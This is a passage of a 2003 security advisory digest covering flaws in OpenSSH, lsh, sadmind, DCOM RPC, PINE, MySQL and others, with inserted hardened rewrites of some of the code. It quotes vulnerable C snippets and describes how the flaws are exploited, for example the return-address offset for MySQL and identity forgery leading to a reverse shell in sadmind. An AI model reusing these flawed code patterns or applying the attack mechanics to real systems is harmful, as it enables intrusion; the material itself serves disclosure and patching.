New ipmasq packages fix insecure packet filtering rules

2003-09-21

Risk level: medium

Type: insecure packet filtering rules

Source of info: Debian Security Team

Impact

ipmasq is a package which simplifies configuration of Linux IP
masquerading, a form of network address translation which allows a
number of hosts to share a single public IP address.  Due to use of
certain improper filtering rules, traffic arriving on the external
interface addressed for an internal host would be forwarded,
regardless of whether it was associated with an established
connection.  

Overview

This vulnerability could be exploited by an attacker
capable of forwarding IP traffic with an arbitrary destination address
to the external interface of a system with ipmasq installed.

Patches

http://security.debian.org/pool/updates/main/i/ipmasq/ipmasq_3.5.10c.tar.gz



Buffer overrun and remote root compromise in lshd

2003-09-20

Risk level: high

Type: remote system compromise

Source of info: LSH, Niels Möller

Impact

All lsh versions prior to lsh-1.4.3, as well as lsh-1.5, lsh-1.5.1 and
lsh-1.5.2, have a *buffer overrun* bug. This bug can lead to remote
root compromise of the lshd daemon, and it can most likely also let a
malicious server execute arbitrary code in the lsh client.

The affected code is run before either host or user authentication.

Overview

The stable release lsh-1.4.3 and the development release lsh-1.5.3
both fix this bug, and two other bugs of similar character (but
different consequences) which were found when grepping the code for
similar mistakes.

All users of lsh and lshd should upgrade, and in case you can't
upgrade lshd immediately, you are *strongly* advised to disable lshd
service.

Credit is due to Bennett Todd, who reported a crash which turned out
to be a buffer overrun. Example exploit programs have been posted to
the full-disclosure mailinglist.

NEWS for lsh-1.4.3:

	Fixed heap buffer overrun with potential remote root
	compromise. Initial bug report by Bennett Todd.

	Fixed a similar bug in the check for channel number allocation
	failure in the handling of channel_open, and in the
	experimental client SRP code.

	Backported lshd setsid fix from lsh-1.5. Should call setsid
	both in the pty and non-pty cases.

	Updated the code to compile with automake-1.7.3 and
	scsh-0.6.0.

The NEWS entry for lsh-1.5.3 is similar, but since it belongs to the
development branch, it also contains some new experimental code:

News for the 1.5.3 release

	Fixed heap buffer overrun with potential remote root
	compromise. Initial bug report by Bennett Todd.

	Fixed a similar bug in the check for channel number allocation
	failure in the handling of channel_open, and in the
	experimental client SRP code.

	lshd now has an experimental mode similar to telnet, where it
	accepts the 'none' authentication method and automatically
	disables services such as X and TCP forwarding. This can be
	useful in environment where it's required that /bin/login or
	some other program handle authentication and session setup
	(e.g. handle security contexts and so on).

If you need a bug-fix-only update, you are advised to either stay with
lsh-1.4.3, or apply the relevant three lines of the 1.4.3 patch,
included below, to your 1.5.2 tree.

Patches

http://www.lysator.liu.se/~nisse/archive/lsh-1.4.3.tar.gz
http://www.lysator.liu.se/~nisse/archive/lsh-1.4.2-1.4.3.diff.gz
http://www.lysator.liu.se/~nisse/archive/lsh-1.5.3.tar.gz
ftp://ftp.lysator.liu.se/pub/security/lsh/lsh-1.4.3.tar.gz
ftp://ftp.lysator.liu.se/pub/security/lsh/lsh-1.4.2-1.4.3.diff.gz
ftp://ftp.lysator.liu.se/pub/security/lsh/lsh-1.5.3.tar.gz



Denial of Service Vulnerability in DB2 Discovery Service

2003-09-19

Risk level: Low

Type: DoS

Source of info: Application Security, Inc.

Impact

IBM DB2 provides a UDP service used as a discovery service for locating
DB2 databases on the network. This UDP service shuts down when sent more
than 20 bytes.

Overview

IBM DB2 is a database that provides many services. One of these services
is a discovery service. This is used to locate a service when
configuring a connection. This service listens on UDP port 523.

This service typically receives a packet such as "DB2GETADDR SQL07020".
If a packet larger than 20 bytes is received by the server, the service
will shutdown.

Once the discovery service crashes, the service "DB2 - DB2DAS00" must be
restarted.

This issue is covered under the fix "IY47686: Search Discovery Listener
Denial of Service Vulnerability".

Patches

Apply FixPak 10a from IBM. This can be downloaded from the following location:
http://www-3.ibm.com/cgi-bin/db2www/data/db2/udb/winos2unix/support/download.d2w/report




Several buffer management bugs in OpenSSH

2003-09-18

Risk level: high

Type: remote system compromise

Source of info: SuSE Security Team

Impact

A set of new bugs were addressed by the openssh development team. These bugs are fixed in the new 3.7.1 upstream release of the openssh package.

A programming error has been found in code responsible for buffer management. If exploited by a (remote) attacker, the error may lead to unauthorized access to the system, allowing the execution of arbitrary commands.

Programming errors of a similar kind as described above have been found in other portions of the code, with similar effects.

Overview

1)  problem description, brief discussion, solution, upgrade information

    The openssh package is the most widely used implementation of the secure
    shell protocol family (ssh). It provides a set of network connectivity
    tools for remote (shell) login, designed to substitute the traditional
    BSD-style r-protocols (rsh, rlogin). openssh has various authentication
    mechanisms and many other features such as TCP connection and X11 display
    forwarding over the fully encrypted network connection as well as file
    transfer facilities.

    This is a new release of SuSE Security Announcement (openssh), 
    ID SuSE-SA:2003:038. A set of new bugs were addressed by the openssh 
    development team. These bugs are fixed in the new 3.7.1 upstream release 
    of the openssh package; we have added the necessary changes to our 
    packages preserving the package version to avoid the risk of incompatible 
    behaviour of the software.

    Specifics about the errors found:
    (Topic for SuSE Security Announcement SuSE-SA:2003:038:)
    A programming error has been found in code responsible for buffer
    management. If exploited by a (remote) attacker, the error may lead to
    unauthorized access to the system, allowing the execution of arbitrary
    commands. The error is known as the buffer_append_space()-bug and is 
    assigned the Common Vulnerabilities and Exposures (CVE) name CAN-2003-0693.
    The error was the cause for the upstream release openssh-3.7.

    (Topic for SuSE Security Announcement SuSE-SA:2003:039 (this announcement):)
    Programming errors of a similar kind as described above have been found in 
    other portions of the code, with similar effects. These errors are known 
    as "buffer.c/channels.c bug", the CVE name for these errors is CAN-2003-0695.
    This set of errors was the cause for the upstream release openssh-3.7.1.
    In addition to the fixes for the buffer.c/channels.c bugs we have added 
    some changes that have been assembled by Solar Designer during his review 
    of the source code. These fixes are considered a precautionary measure and 
    are not believed to have a significant effect on the security of the 
    openssh code.

    At the time of writing this announcement, we believe that at least one set 
    of errors as described above is exploitable by a remote attacker. As a 
    reminder,  at the time of writing the SuSE Security Announcement 
    SuSE-SA:2003:038 it was unclear if the bug addressed with the announcement
    (buffer_append_space()-bug) is exploitable. An increasing amount of TCP 
    connection attempts to port 22 as observed in the internet during the 
    past days may indicate that there exists an exploit for the error in the 
    public.

    Please note that we have disabled the Privilege Separation feature in
    the ssh daemon (sshd) with this update. The PrivSep feature is designed
    to have parts of the ssh daemon's work running under lowered privileges,
    thereby limiting the effect of a possible vulnerability in the code. The
    PrivSep feature is turned on/off by the UsePrivilegeSeparation keyword
    in sshd's configuration file /etc/ssh/sshd_config. The feature is held
    responsible for malfunctions in PAM (Pluggable Authentication Modules).
    The update mechanism will not overwrite configuration files that have
    been altered after the package installation.



    SPECIAL INSTALL INSTRUCTIONS:
    ==============================
    After the update has been successfully applied, the ssh daemon (sshd)
    must be restarted for the update package to take effect. To restart the
    ssh daemon after the update, please run the following command as root:

      rcsshd restart


    Please download the update package for your distribution and verify its
    integrity by the methods listed in section 3) of this announcement.
    Then, install the package using the command "rpm -Fhv file.rpm" to apply
    the update.
    Our maintenance customers are being notified individually. The packages
    are being offered to install from the maintenance web.

Patches

http://www.openssh.com/txt/buffer.adv
  Intel i386 Platform:

    SuSE-8.2:
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/openssh-3.5p1-107.i586.rpm
      e030b0803481d0f29f576e3b4726284f
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/openssh-3.5p1-107.i586.patch.rpm
      d022894363b99e6bd03e9b2109c2244c
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/openssh-3.5p1-107.src.rpm
      3f7f5ed43c7d795c63fe06148874944a

    SuSE-8.1:
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/openssh-3.4p1-215.i586.rpm
      91cdd33a4149756b8f6371aa3177a5f4
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/openssh-3.4p1-215.i586.patch.rpm
      3b7c44819c8fed5e33514481d99d4ab7
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/openssh-3.4p1-215.src.rpm
      6c3694fc75bcf185035547b85abbc491

    SuSE-8.0:
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/sec1/openssh-3.4p1-215.i386.rpm
      c61781b97767188cc3a39795535307ff
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/sec1/openssh-3.4p1-215.i386.patch.rpm
      c222aef79a8fef6d44d8d61fc075efc5
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/openssh-3.4p1-215.src.rpm
      bc327a4150058c9d1216cb96712973a5

    SuSE-7.3:
    ftp://ftp.suse.com/pub/suse/i386/update/7.3/sec1/openssh-2.9.9p2-156.i386.rpm
      c9928c04b03cb292aa96ad6890a5ee38
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/openssh-2.9.9p2-156.src.rpm
      28aa82be9233e3ba93b94eb138c9ea04

    SuSE-7.2:
    ftp://ftp.suse.com/pub/suse/i386/update/7.2/sec1/openssh-2.9.9p2-156.i386.rpm
      b369724a788a2c6bd70a448a49530f69
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/openssh-2.9.9p2-156.src.rpm
      98b8b7281fe04aab8c8838adcf195697




    Sparc Platform:

    SuSE-7.3:
    ftp://ftp.suse.com/pub/suse/sparc/update/7.3/sec1/openssh-2.9.9p2-53.sparc.rpm
      97cb0218e9354b8cc062e44a0d6fb19f
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/openssh-2.9.9p2-53.src.rpm
      8cddb96e633864469d7ba08d3cf7436a



    PPC Power PC Platform:

    SuSE-7.3:
    ftp://ftp.suse.com/pub/suse/ppc/update/7.3/sec1/openssh-2.9.9p2-109.ppc.rpm
      37b1e82a3971f5c4c427ce37227b11e0
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/openssh-2.9.9p2-109.src.rpm
      7a19424887772b86d14bacbf5add9628





Remote Root Exploitation of Default Solaris sadmind Setting

2003-09-16

Risk level: high

Type: remote system compromise

Source of info: iDEFENSE Labs

Impact

Solstice AdminSuite is a set of tools packaged by Sun Microsystems Inc. in its Solaris operating system to help administrators manage systems remotely, centralize configuration information and monitor software usage.

An exploit has surfaced that allows remote attackers to execute arbitrary commands with super-user privileges against Solaris hosts running the default RPC authentication scheme in Solstice AdminSuite.

Overview

Solstice AdminSuite is a set of tools packaged by Sun Microsystems Inc.
in its Solaris operating system to help administrators manage systems
remotely, centralize configuration information and monitor software
usage.  The sadmind daemon is used by Solstice AdminSuite applications
to perform these distributed system administration operations.  The
sadmind daemon is typically installed and enabled in a default Solaris
installation.


II. DESCRIPTION

An exploit has surfaced that allows remote attackers to execute
arbitrary commands with super-user privileges against Solaris hosts
running the default RPC authentication scheme in Solstice AdminSuite.
This weakness is documented to some extent in Sun documentation,
http://docs.sun.com/db/doc/816-0211/6m6nc676b?a=view .

By sending a sequence of specially crafted Remote Procedure Call (RPC)
requests to the sadmind daemon, an attacker can exploit this
vulnerability to gain unauthorized root access to a vulnerable system.
The sadmind daemon defaults to weak authentication (AUTH_SYS), making
it possible for a remote attacker to send a sequence of specially
crafted RPC packets to forge the client identity.

After the identity has been successfully forged, the attacker can
invoke a feature within the daemon itself to execute a shell as root
or, depending on the forged credential, any other valid user of the
system. The daemon will execute the program of the attacker's choice;
for example, spawning a reverse-network shell back to the attacker for
input/output control. Under certain circumstances, a reverse-network
shell could allow the attacker to bypass firewalls and/or filters.

III. ANALYSIS

Because the weakness exists at the application level, successful
exploitation does not require the use of machine-specific code, nor
does it require any previous knowledge of the target's architecture.
Therefore, any local or remote attacker could execute commands as root
on a vulnerable system running the sadmind service. By default, sadmind
is installed and started at system boot time on most default and fully
patched installations of Solaris. While many other vendors rely on
SUNRPC related routines from Sun, this design issue is confined to
Sun's sadmind authentication implementation in Solaris. The most
inherent threat is if this exploit becomes packaged into a
cross-platform worm, were it to become publicly available.

IV. DETECTION

An exploit has been obtained and demonstrated in real-world conditions
on systems running Solaris or Trusted Solaris operating systems running
sadmind. Default installations of SunOS 5.3 thru 5.9 (Solaris 2.x, 7,
8, 9) on both the SPARC and x86 platforms are susceptible. In addition,
versions 7 and 8 of Trusted Solaris on both the SPARC and x86 platforms
are susceptible to exploitation. Exploitation occurs through an initial
request through UDP or TCP port 111 (sunrpc).

V. WORKAROUNDS

For Solaris hosts that do not require the Solstice AdminSuite related
services, disable the sadmind service by commenting out the appropriate
line in /etc/inetd.conf.  Make sure to restart inetd after changing
this file (e.g. pkill -HUP inetd).

For networks, ensure proper ingress filters are in place on the
Internet router and firewall, especially on TCP and UDP port 111.

For Solaris hosts that require the Solstice AdminSuite to be running,
the authentication security settings of sadmind should be increased to
STRONG (AUTH_DES); this is not the default setting. This setting also
requires NIS or NIS+ DES keys to have been created for each Solaris
user and each host.

In order to upgrade the authentication setting, the sadmind line in
/etc/inetd.conf should be changed to look like the following:

100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -S 2

Sun also recommends using the Solaris Security Toolkit (JASS) to harden
a Solaris system, http://wwws.sun.com/software/security/jass/ .



Local security bug in OpenBSD semaphore handling

2003-09-10

Risk level: medium

Type: integer overflow

Source of info: blexim

Impact

An integer overflow condition exists in the OpenBSD 3.3-release kernel
and all previous versions.  It is possible for root to write to
semi-arbitrary kernel memory irrespective of securelevel. This
potentially bypasses securelevel as root may modify the running kernel,
introducing kernel level backdoors etc.

Overview

The mechanism used to achieve this is an
integer overflow in the semget(2) syscall, described below:

sys_semget() allocates a buffer here:

src/sys/kern/sysv_sem.c:
sys_semget():
  semaptr_new->sem_base = malloc(nsems * sizeof(struct sem),
      M_SEM, M_WAITOK);


provided the following checks are passed:

src/sys/kern/sysv_sem.c:
sys_semget():
  if (nsems <= 0 || nsems > seminfo.semmsl) {
      DPRINTF(("nsems out of range (0<%d<=%d)\n", nsems,
        seminfo.semmsl));
      return (EINVAL);
  }
  if (nsems > seminfo.semmns - semtot) {
      DPRINTF(("not enough semaphores left (need %d, got %d)\n",
        nsems, seminfo.semmns - semtot));
      return (ENOSPC);
  }

If these checks are passed and the buffer is successfully allocated,
the nsems (number of semaphores) value associated with the semaphore
set is set here:

src/sys/kern/sysv_sem.c:
sys___semctl():
  semaptr_new->sem_nsems = nsems;

Please also note that an int is being assigned to a short here, which
is a potential source of another bug. Since root is able to raise the
values of seminfo.semmns and seminfo.semmsl to arbitrary values via
sysctl, it is possible to mis-size the malloc'd buffer, allowing memory
to be read and written via the semctl(2) syscall.

The fix has been committed to the -STABLE branch.

You don't need to upgrade to -current; moreover, this is not a trivial
operation since the format of executable files changed on x86 since 3.3.

Just keep your current 3.3 version, sync your CVS tree with the
OPENBSD_3_3 tag, recompile your kernel and reboot.
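The size arithmetic described above, modelled as it behaves on a 32-bit kernel and placed beside a hardened version of the same checks, as an added example that is not OpenBSD's code; struct sem, seminfo, the limit values and try_semget() are constructed for this illustration.

```c
/*
 * Added example, not OpenBSD's code: models the size arithmetic of
 * sys_semget() described above as it behaves on a 32-bit kernel (uint32_t
 * stands in for the i386 size_t), beside a hardened version of the same
 * checks. struct sem, seminfo, the limit values and try_semget() are
 * constructed for this illustration.
 */
#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>

struct sem {                      /* constructed stand-in: 12 bytes, no padding */
    uint16_t semval, semzcnt, semncnt, pad;
    int32_t  sempid;
};

/* Tunables that root can raise through sysctl (constructed defaults). */
static struct { int semmsl; int semmns; } seminfo = { 60, 60 };
static int semtot = 0;

/* What the kernel records for one semaphore set. */
struct semset {
    int            err;          /* 0, EINVAL or ENOSPC */
    uint32_t       alloc_bytes;  /* size handed to malloc() */
    unsigned short sem_nsems;    /* the short the advisory mentions */
};

/* Mirrors the original logic: the only bounds on nsems are the sysctl
 * limits, so once root raises them the multiply can wrap and the
 * int-to-short assignment can truncate. */
int vulnerable_semget(int nsems, struct semset *out)
{
    if (nsems <= 0 || nsems > seminfo.semmsl)
        return EINVAL;
    if (nsems > seminfo.semmns - semtot)
        return ENOSPC;
    out->alloc_bytes = (uint32_t)nsems * (uint32_t)sizeof(struct sem); /* may wrap */
    out->sem_nsems   = nsems;                                          /* may truncate */
    return 0;
}

/* Hardened: bound nsems by what the metadata field can hold and refuse
 * any count whose byte size does not fit the size type. */
int hardened_semget(int nsems, struct semset *out)
{
    if (nsems <= 0 || nsems > seminfo.semmsl)
        return EINVAL;
    if (nsems > seminfo.semmns - semtot)
        return ENOSPC;
    if (nsems > USHRT_MAX)                                   /* would truncate */
        return EINVAL;
    if ((uint32_t)nsems > UINT32_MAX / sizeof(struct sem))  /* would wrap */
        return EINVAL;
    out->alloc_bytes = (uint32_t)nsems * (uint32_t)sizeof(struct sem);
    out->sem_nsems   = (unsigned short)nsems;
    return 0;
}

/* One semget() attempt after root has raised both limits to `limit`. */
struct semset try_semget(int limit, int nsems, int hardened)
{
    struct semset s = { 0, 0, 0 };
    seminfo.semmsl = seminfo.semmns = limit;
    s.err = hardened ? hardened_semget(nsems, &s) : vulnerable_semget(nsems, &s);
    return s;
}

int main(void)
{
    /* 357913942 * 12 == 2^32 + 8: the allocation wraps to 8 bytes while
     * sem_nsems keeps 357913942 mod 65536 == 21846 semaphores. */
    struct semset v = try_semget(INT_MAX, 357913942, 0);
    struct semset h = try_semget(INT_MAX, 357913942, 1);
    printf("vulnerable: err=%d, %u bytes allocated for %u semaphores\n",
           v.err, (unsigned)v.alloc_bytes, (unsigned)v.sem_nsems);
    printf("hardened:   err=%d (%s)\n", h.err,
           h.err == EINVAL ? "rejected" : "accepted");
    return 0;
}
```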

Patches

For more info about processing -STABLE branch:
 http://www.openbsd.org/stable.html
 http://www.uk.openbsd.org/anoncvs.html
 http://www.openbsd.org/cvsup.html
And for patch:
http://www.openbsd.org/cgi-bin/cvsweb.cgi/src/sys/kern/sysv_sem.c

  



Buffer Overrun In RPCSS Service Could Allow Code Execution

2003-09-10

Risk level: critical

Type: Buffer overrun

Source of info: Microsoft Security Team

Impact

There are three identified vulnerabilities in the part of RPCSS Service that deals with RPC messages for DCOM activation: two that could allow arbitrary code execution and one that could result in a denial of service.

An attacker who successfully exploited these vulnerabilities could be able to run code with Local System privileges on an affected system, or could cause the RPCSS Service to fail. The attacker could then be able to take any action on the system, including installing programs, viewing, changing or deleting data, or creating new accounts with full privileges.

Overview

The fix provided by this patch supersedes the one included in 
Microsoft Security Bulletin MS03-026.

Remote Procedure Call (RPC) is a protocol used by the Windows 
operating system. RPC provides an inter-process communication 
mechanism that allows a program running on one computer to 
seamlessly access services on another computer. The protocol 
itself is derived from the Open Software Foundation (OSF) RPC 
protocol, but with the addition of some Microsoft specific 
extensions. 

There are three identified vulnerabilities in the part of RPCSS 
Service that deals with RPC messages for DCOM activation: two 
that could allow arbitrary code execution and one that could 
result in a denial of service. The flaws result from incorrect 
handling of malformed messages. These particular vulnerabilities 
affect the Distributed Component Object Model (DCOM) interface 
within the RPCSS Service. This interface handles DCOM object 
activation requests that are sent from one machine to another.

An attacker who successfully exploited these vulnerabilities 
could be able to run code with Local System privileges on an 
affected system, or could cause the RPCSS Service to fail. The 
attacker could then be able to take any action on the system, 
including installing programs, viewing, changing or deleting 
data, or creating new accounts with full privileges.

To exploit these vulnerabilities, an attacker could create a 
program to send a malformed RPC message to a vulnerable system 
targeting the RPCSS Service.

Microsoft has released a tool that can be used to scan a network 
for the presence of systems which have not had the MS03-039 patch 
installed. More details on this tool are available in Microsoft 
Knowledge Base article 827363. This tool supersedes the one 
provided in Microsoft Knowledge Base article 826369. If the tool 
provided in Microsoft Knowledge Base Article 826369 is used 
against a system which has installed the security patch provided 
with this bulletin, the superseded tool will incorrectly report 
that the system is missing the patch provided in MS03-026. 
Microsoft encourages customers to run the latest version of the 
tool available in Microsoft Knowledge Base article 827363 to 
determine if their systems are patched.

Firewall best practices and standard default firewall configurations can help protect networks from remote attacks originating outside of the enterprise perimeter. Best practices recommend blocking all ports that are not actually being used. For this reason, most systems attached to the Internet should have a minimal number of the affected ports exposed.

Patches

http://www.microsoft.com/technet/security/bulletin/MS03-039.asp 
http://www.microsoft.com/security/security_bulletins/MS03-039.asp



Two Exploitable Overflows in PINE

2003-09-10

Risk level: medium

Type: Buffer overflow

Source of info: iDEFENSE Labs

Impact

PINE (The Program for Internet News & Email) is a popular e-mail client shipped with many Linux and Unix distributions. It was developed at the University of Washington; more information is available at http://www.washington.edu/pine/ .

PINE contains two exploitable vulnerabilities that can be triggered when a victim opens a specially crafted email sent by an attacker.

Overview

PINE contains two exploitable vulnerabilities that can be triggered
when a victim opens a specially crafted email sent by an attacker.

--- Vulnerability 1: Buffer Overflow ---

A remotely exploitable buffer overflow exists within the parsing of the
message/external-body type attribute name/value pairs. Failure to check
that the length of the longest attribute is less than the space
available allows a maliciously formed e-mail message to overwrite
control structures. Careful modification of these values allows
arbitrary code execution. However, exploitation requires knowledge of
the targeted version of PINE.

A 20kb character array is declared as:

headers.h:
#define SIZEOF_20KBUF (20480)

pine.c:
char tmp_20k_buf[SIZEOF_20KBUF];

The tmp_20k_buf[] array is stored within the .bss section and
referenced with a character pointer 'd'.  The overflow occurs within
the following snippet of code from the display_parameters() routine in
mailview.c:

d = tmp_20k_buf;
if(parmlist = rfc2231_newparmlist(params)){
    while(rfc2231_list_params(parmlist) && d < tmp_20k_buf + 10000){
        sprintf(d, "%-*s: %s\n", longest, parmlist->attrib,
                parmlist->value ? strsquish(tmp_20k_buf + 11000,
                parmlist->value, 100)
                : "");
        d += strlen(d);
    }
}

Starting at 'd', the code adds spaces to the left of the string as
padding to make the total length of the parameter attribute string
equal to that of the 'longest', and then displays the attribute
name/value pairs. Example:

Access-Type: ftp
        URL: ftp://localhost/pub/interesting.ps

Supplying any attribute name that is over 20kb in length will overflow
the buffer, eventually allowing for arbitrary code execution.
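A bounded rewrite of the display loop above, added here as an example (not PINE's code): the attribute names are still padded to 'longest', but every write goes through snprintf with the remaining space, and an attribute that cannot fit is rejected instead of written. The 'param' structure, 'format_param_list' and the two demo_ functions are hypothetical names for this example; the inputs they use are constructed.

```c
/* Added example, not PINE's code: display_parameters()'s loop with
 * explicit space accounting.  Names are hypothetical. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define SIZEOF_20KBUF (20480)   /* same constant as PINE's headers.h */

struct param {
    const char *attrib;
    const char *value;
};

/* Hardened version of the loop.  Returns the number of bytes written
 * (excluding the terminating NUL), or -1 if the output would not fit.
 * No byte is ever written past buf + bufsz. */
int format_param_list(char *buf, size_t bufsz,
                      const struct param *params, size_t nparams)
{
    size_t used = 0, longest = 0, i;

    if (bufsz == 0) return -1;
    buf[0] = '\0';

    /* Same padding rule as PINE: pad attribute names to the longest one. */
    for (i = 0; i < nparams; i++) {
        size_t l = strlen(params[i].attrib);
        if (l > longest) longest = l;
    }
    /* An attribute longer than the whole buffer can never fit; reject it
     * up front instead of letting the width specifier decide. */
    if (longest >= bufsz) return -1;

    for (i = 0; i < nparams; i++) {
        int n = snprintf(buf + used, bufsz - used, "%-*s: %s\n",
                         (int)longest, params[i].attrib,
                         params[i].value ? params[i].value : "");
        if (n < 0 || (size_t)n >= bufsz - used) {
            buf[used] = '\0';   /* truncated: leave a clean, terminated buffer */
            return -1;
        }
        used += (size_t)n;
    }
    return (int)used;
}

/* Constructed input: the two benign pairs shown in the advisory. */
int demo_benign(void)
{
    static char tmp_20k_buf[SIZEOF_20KBUF];
    struct param p[] = {
        { "Access-Type", "ftp" },
        { "URL", "ftp://localhost/pub/interesting.ps" },
    };
    return format_param_list(tmp_20k_buf, sizeof tmp_20k_buf, p, 2);
}

/* Constructed input: one attribute name longer than the 20kb buffer,
 * the condition the advisory describes.  The hardened loop refuses it. */
int demo_oversized(void)
{
    static char tmp_20k_buf[SIZEOF_20KBUF];
    static char big[SIZEOF_20KBUF + 100];
    struct param p[1];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    p[0].attrib = big;
    p[0].value = "x";
    return format_param_list(tmp_20k_buf, sizeof tmp_20k_buf, p, 1);
}
```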


--- Vulnerability 2: Integer Overflow ---

A remotely exploitable integer overflow exists in the parsing of e-mail
headers, allowing for arbitrary code execution upon the opening of a
malicious e-mail. The vulnerability exists within the
rfc2231_get_param() routine found in the strings.c file. A character
array of size 64 is declared:

#define RFC2231_MAX 64
...
char *pieces[RFC2231_MAX];

and indexed by the signed integer variable 'n':

if(n < RFC2231_MAX){      /* no lower bound: a negative 'n' passes this test */
    pieces[n] = parms->value;
}

The variable 'n' is attacker-controlled and can be set to contain a
negative value that satisfies the if statement yet references an
out-of-bounds index within the pieces[] array. Arbitrary code execution
is possible by storing assembly code within the parms->value structure
and writing beyond the 64-byte character array, thereby overwriting the
stored instruction pointer on the stack.
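An added example (not PINE's code) of checking the RFC 2231 section number on both sides before it is used as an index: 'rfc2231_section' parses parameter names such as title*0* and rejects negative or out-of-range sections, and the two index_in_range_ functions contrast the original one-sided test with the corrected one. All function names are hypothetical.

```c
/* Added example, not PINE's code: RFC 2231 section parsing with a
 * two-sided range check.  Function names are hypothetical. */
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <limits.h>

#define RFC2231_MAX 64      /* same constant as PINE's strings.c */

/* The original guard: only an upper bound, so a negative 'n' passes and
 * pieces[n] would write below the array. */
int index_in_range_vulnerable(int n)
{
    return n < RFC2231_MAX;
}

/* Corrected guard: the index must lie inside [0, RFC2231_MAX). */
int index_in_range_fixed(int n)
{
    return n >= 0 && n < RFC2231_MAX;
}

/* Parse "name*N" or "name*N*" (an RFC 2231 continuation, optionally with
 * the trailing '*' that marks charset/language encoding).
 * Returns the section number N on success, -1 if the name carries no
 * section, or -2 if the section is malformed or outside [0, RFC2231_MAX).
 * *extended is set to 1 when the trailing '*' is present. */
int rfc2231_section(const char *attrib, int *extended)
{
    const char *star = strchr(attrib, '*');
    const char *digits;
    char *end;
    long n;

    *extended = 0;
    if (star == NULL) return -1;                 /* plain name, e.g. "title" */
    digits = star + 1;
    if (*digits == '\0') {                       /* "title*": encoded, single section */
        *extended = 1;
        return -1;
    }
    /* Only an unsigned decimal is allowed: reject a leading sign so that a
     * value such as "-5" can never reach the array index. */
    if (*digits < '0' || *digits > '9') return -2;
    errno = 0;
    n = strtol(digits, &end, 10);
    if (errno != 0 || n > INT_MAX) return -2;
    if (*end == '*' && end[1] == '\0') { *extended = 1; end++; }
    if (*end != '\0') return -2;                 /* trailing junk */
    if (!index_in_range_fixed((int)n)) return -2;
    return (int)n;
}

/* Convenience wrappers for callers that need only one of the results. */
int section_of(const char *attrib)
{
    int e = 0;
    return rfc2231_section(attrib, &e);
}

int is_extended(const char *attrib)
{
    int e = 0;
    rfc2231_section(attrib, &e);
    return e;
}
```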

If an attacker were to socially engineer a PINE user into opening a
malformed e-mail message, arbitrary code embedded within can then run
with privileges of the currently logged on user. It would be trivial
for this exploit to be fashioned into a worm, targeting e-mail
addresses found in any readable text files (inbox, etc.).

Patches

http://www.washington.edu/pine/getpine/



Buffer overflow in MySQL

2003-09-10

Risk level: high

Type: Buffer overflow

Source of info: Frank Denis

Impact

Passwords of MySQL users are stored in the "User" table, part of the "mysql"
database, specifically in the "Password" field.

In MySQL 4.0.x and 3.23.x, these passwords are hashed and stored as a 16
character long hexadecimal value.

Unfortunately, a function involved in password checking lacks correct bounds
checking. By filling a "Password" field with a value wider than 16 characters, a
buffer overflow will occur.

Overview

Anyone with global administrative privileges on a MySQL server may execute
arbitrary code even on a host he isn't supposed to have a shell on, with the
privileges of the system account running the MySQL server.


-----[ Details ]-----

The get_salt_from_password() function defined in sql/password.c takes an
arbitrarily long hex password and returns an arbitrarily long binary array
with the decoded values:

void get_salt_from_password(ulong *res,const char *password)
{
    res[0]=res[1]=0;
    if (password)
    {
        /* One ulong is written per 8 hex digits for as long as the input
           lasts; nothing bounds the writes to the size of 'res'. */
        while (*password)
        {
            ulong val=0;
            uint i;
            for (i=0 ; i < 8 ; i++)
                val=(val << 4)+char_val(*password++);
            *res++=val;
        }
    }
    return;
}

This function is called from sql/sql_acl.cc to check for access control.

It is passed the raw content of the Password field from the User table of
the mysql database.

The process aborts if the length is not a multiple of 8, but this is the
only check before get_salt_from_password() is actually called.

The overflow occurs on a local ACL_USER instance in acl_init(), and
successful exploitation of that bug is trivial on some platforms. On most
Linux systems the return address needs about 444 bytes to get overwritten.
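The same decoder with the destination size made explicit, added as an example (not MySQL's code): the word count derived from the hash length is checked against the capacity of 'res' before anything is written, and the ACL-side helper accepts only a 16-character hash. 'char_val' is reimplemented here; 'get_salt_checked', 'decode_password_field' and the demo_ functions are hypothetical names, and the sample hash is constructed.

```c
/* Added example, not MySQL's code: get_salt_from_password() with a bound
 * on the output array.  The original spells the word type 'ulong';
 * 'unsigned long' is used directly here. */
#include <string.h>
#include <stddef.h>

/* hex digit -> value, as password.c does it; -1 on a non-hex character */
static int char_val(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Hardened decoder.  'res_words' is the capacity of 'res'; the original
 * routine has no such parameter and writes one word per 8 hex digits for
 * as long as the input lasts, which is the overflow described above.
 * Returns the number of words decoded, or -1 on any of: length not a
 * multiple of 8, more words than 'res' can hold, non-hex character. */
int get_salt_checked(unsigned long *res, size_t res_words, const char *password)
{
    size_t len, words, w;

    if (res_words < 2) return -1;
    res[0] = res[1] = 0;
    if (password == NULL) return 0;
    len = strlen(password);
    if (len % 8 != 0) return -1;           /* the only check the original code had */
    words = len / 8;
    if (words > res_words) return -1;      /* the missing bound */
    for (w = 0; w < words; w++) {
        unsigned long val = 0;
        unsigned i;
        for (i = 0; i < 8; i++) {
            int v = char_val(*password++);
            if (v < 0) return -1;
            val = (val << 4) + (unsigned long)v;
        }
        res[w] = val;
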